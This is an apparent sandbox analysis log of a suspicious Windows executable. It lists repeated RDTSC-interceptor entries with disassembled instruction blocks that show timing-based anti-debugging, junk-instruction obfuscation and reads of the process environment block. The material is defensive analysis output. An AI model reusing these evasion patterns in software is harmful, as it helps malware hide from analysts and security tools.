Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0008 second address: 72A000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A000E second address: 72A0060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7292A9B0Ah 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, bx 0x0000001d pushfd 0x0000001e jmp 00007FC7292A9B19h 0x00000023 sbb ah, FFFFFFC6h 0x00000026 jmp 00007FC7292A9B11h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0060 second address: 72A0066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0066 second address: 72A0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7292A9B12h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0084 second address: 72A00DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 mov bh, al 0x00000015 popad 0x00000016 sub esp, 18h 0x00000019 pushad 0x0000001a call 00007FC728ECBE19h 0x0000001f pop edx 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC728ECBE15h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A00DA second address: 72A00FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7292A9B0Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A00FE second address: 72A013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c jmp 00007FC728ECBE15h 0x00000011 mov bh, ch 0x00000013 popad 0x00000014 mov ebx, dword ptr [eax+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC728ECBE16h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A013D second address: 72A0143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0143 second address: 72A0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0147 second address: 72A016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A016A second address: 72A017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A017A second address: 72A01EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC7292A9B0Fh 0x00000013 or eax, 703A99FEh 0x00000019 jmp 00007FC7292A9B19h 0x0000001e popfd 0x0000001f jmp 00007FC7292A9B10h 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, bx 0x0000002c jmp 00007FC7292A9B19h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A01EF second address: 72A022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ah, 38h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [762C06ECh] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 pushfd 0x00000018 jmp 00007FC728ECBE18h 0x0000001d xor ah, FFFFFFE8h 0x00000020 jmp 00007FC728ECBE0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A022F second address: 72A0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0235 second address: 72A0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b call 00007FC728ECBE0Dh 0x00000010 pushfd 0x00000011 jmp 00007FC728ECBE10h 0x00000016 and cx, 6A78h 0x0000001b jmp 00007FC728ECBE0Bh 0x00000020 popfd 0x00000021 pop eax 0x00000022 mov cl, dl 0x00000024 popad 0x00000025 jne 00007FC728ECCCFDh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dl, BDh 0x00000030 mov esi, 448FCDB5h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0284 second address: 72A02D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B11h 0x00000009 sub eax, 36DBDDC6h 0x0000000f jmp 00007FC7292A9B11h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC7292A9B0Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A02D4 second address: 72A033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE11h 0x00000009 xor ecx, 4207C086h 0x0000000f jmp 00007FC728ECBE11h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC728ECBE10h 0x0000001b or cl, 00000028h 0x0000001e jmp 00007FC728ECBE0Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC728ECBE15h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A033C second address: 72A03BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [76290B60h] 0x00000011 mov eax, 75A0E5E0h 0x00000016 ret 0x00000017 pushad 0x00000018 jmp 00007FC7292A9B10h 0x0000001d mov ch, B6h 0x0000001f popad 0x00000020 push 00000044h 0x00000022 jmp 00007FC7292A9B0Dh 0x00000027 pop edi 0x00000028 jmp 00007FC7292A9B0Eh 0x0000002d xchg eax, edi 0x0000002e pushad 0x0000002f mov esi, 503F921Dh 0x00000034 movzx ecx, bx 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007FC7292A9B14h 0x0000003e xchg eax, edi 0x0000003f jmp 00007FC7292A9B10h 0x00000044 push dword ptr [eax] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 movsx edx, ax 0x0000004c push ecx 0x0000004d pop edi 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A03BB second address: 72A03FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FC728ECBE0Dh 0x0000000c sbb cx, 0F76h 0x00000011 jmp 00007FC728ECBE11h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr fs:[00000030h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC728ECBE0Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A04C4 second address: 72A04C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A04C9 second address: 72A0521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FC728ECBE10h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 jmp 00007FC728ECBE10h 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC728ECBE17h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0521 second address: 72A0528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0528 second address: 72A0545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d mov eax, ebx 0x0000000f popad 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov si, 6C3Fh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0545 second address: 72A054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A054B second address: 72A054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A054F second address: 72A055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A055D second address: 72A0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx esi, di 0x0000000c popad 0x0000000d mov dword ptr [esi+14h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC728ECBE18h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0594 second address: 72A05A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05A6 second address: 72A05AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05AA second address: 72A05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC7292A9B18h 0x00000013 mov ax, F6E1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05D5 second address: 72A05F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 53522860h 0x00000008 mov cx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+18h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC728ECBE0Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05F6 second address: 72A05FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05FC second address: 72A0657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e jmp 00007FC728ECBE0Eh 0x00000013 mov dword ptr [esi+1Ch], eax 0x00000016 jmp 00007FC728ECBE10h 0x0000001b mov eax, dword ptr [ebx+5Ch] 0x0000001e jmp 00007FC728ECBE10h 0x00000023 mov dword ptr [esi+20h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC728ECBE0Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0657 second address: 72A065D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A065D second address: 72A0663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0663 second address: 72A0667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0667 second address: 72A06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e jmp 00007FC728ECBE10h 0x00000013 mov dword ptr [esi+24h], eax 0x00000016 jmp 00007FC728ECBE10h 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e pushad 0x0000001f mov ax, 96EDh 0x00000023 jmp 00007FC728ECBE0Ah 0x00000028 popad 0x00000029 mov dword ptr [esi+28h], eax 0x0000002c jmp 00007FC728ECBE10h 0x00000031 mov eax, dword ptr [ebx+68h] 0x00000034 jmp 00007FC728ECBE10h 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC728ECBE0Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A06F5 second address: 72A06FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A06FB second address: 72A0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 adc esi, 008FEB48h 0x0000000f jmp 00007FC728ECBE0Bh 0x00000014 popfd 0x00000015 mov esi, 1497C2BFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ax, word ptr [ebx+6Ch] 0x00000021 jmp 00007FC728ECBE12h 0x00000026 mov word ptr [esi+30h], ax 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e mov edx, esi 0x00000030 popad 0x00000031 mov ax, word ptr [ebx+00000088h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edi, si 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0756 second address: 72A07D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B0Fh 0x00000009 adc ax, 8B9Eh 0x0000000e jmp 00007FC7292A9B19h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC7292A9B10h 0x0000001a sub ch, FFFFFF98h 0x0000001d jmp 00007FC7292A9B0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov word ptr [esi+32h], ax 0x0000002a jmp 00007FC7292A9B16h 0x0000002f mov eax, dword ptr [ebx+0000008Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov cx, dx 0x0000003b mov dh, 83h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A07D4 second address: 72A0817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007FC728ECBE16h 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 pushad 0x00000015 mov cl, DCh 0x00000017 call 00007FC728ECBE13h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0817 second address: 72A08DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+38h], eax 0x00000009 pushad 0x0000000a mov al, dl 0x0000000c pushfd 0x0000000d jmp 00007FC7292A9B0Ch 0x00000012 xor esi, 1003DF18h 0x00000018 jmp 00007FC7292A9B0Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC7292A9B14h 0x00000029 xor cl, 00000078h 0x0000002c jmp 00007FC7292A9B0Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007FC7292A9B18h 0x00000038 and si, 63D8h 0x0000003d jmp 00007FC7292A9B0Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [esi+3Ch], eax 0x00000047 pushad 0x00000048 mov si, 60ABh 0x0000004c pushfd 0x0000004d jmp 00007FC7292A9B10h 0x00000052 or ax, AE38h 0x00000057 jmp 00007FC7292A9B0Bh 0x0000005c popfd 0x0000005d popad 0x0000005e mov eax, dword ptr [ebx+20h] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FC7292A9B15h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A08DB second address: 72A08EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0A49 second address: 72A0AD9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7292A9B10h 0x00000008 sbb esi, 6DAB4058h 0x0000000e jmp 00007FC7292A9B0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC7292A9B18h 0x0000001c xor si, CAB8h 0x00000021 jmp 00007FC7292A9B0Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov edi, eax 0x0000002a pushad 0x0000002b mov bl, al 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 test edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC7292A9B15h 0x0000003c sbb cx, 0806h 0x00000041 jmp 00007FC7292A9B11h 0x00000046 popfd 0x00000047 push eax 0x00000048 pop ebx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0AD9 second address: 72A0AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC797E6A9DFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC728ECBE0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0AFF second address: 72A0B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B26 second address: 72A0B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC728ECBE0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B4D second address: 72A0B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B5D second address: 72A0B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 3671E436h 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B7D second address: 72A0C1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007FC7292A9B10h 0x00000010 nop 0x00000011 pushad 0x00000012 mov ecx, 18A0315Dh 0x00000017 push esi 0x00000018 pushfd 0x00000019 jmp 00007FC7292A9B19h 0x0000001e sbb cx, C9A6h 0x00000023 jmp 00007FC7292A9B11h 0x00000028 popfd 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushfd 0x00000032 jmp 00007FC7292A9B19h 0x00000037 and ax, 49B6h 0x0000003c jmp 00007FC7292A9B11h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0C1E second address: 72A0C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007FC728ECBE0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 mov si, 6987h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D27 second address: 72A0D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 75h 0x00000005 mov bx, 1B90h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FC79824848Ch 0x00000012 pushad 0x00000013 call 00007FC7292A9B15h 0x00000018 mov di, ax 0x0000001b pop ecx 0x0000001c call 00007FC7292A9B0Dh 0x00000021 movzx ecx, di 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov eax, dword ptr [ebp-04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D6E second address: 72A0D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D72 second address: 72A0D78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D78 second address: 72A0D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D8F second address: 72A0DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7292A9B17h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DB5 second address: 72A0DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DB9 second address: 72A0DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DBF second address: 72A0DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DCE second address: 72A0DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7292A9B10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DEB second address: 72A0DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
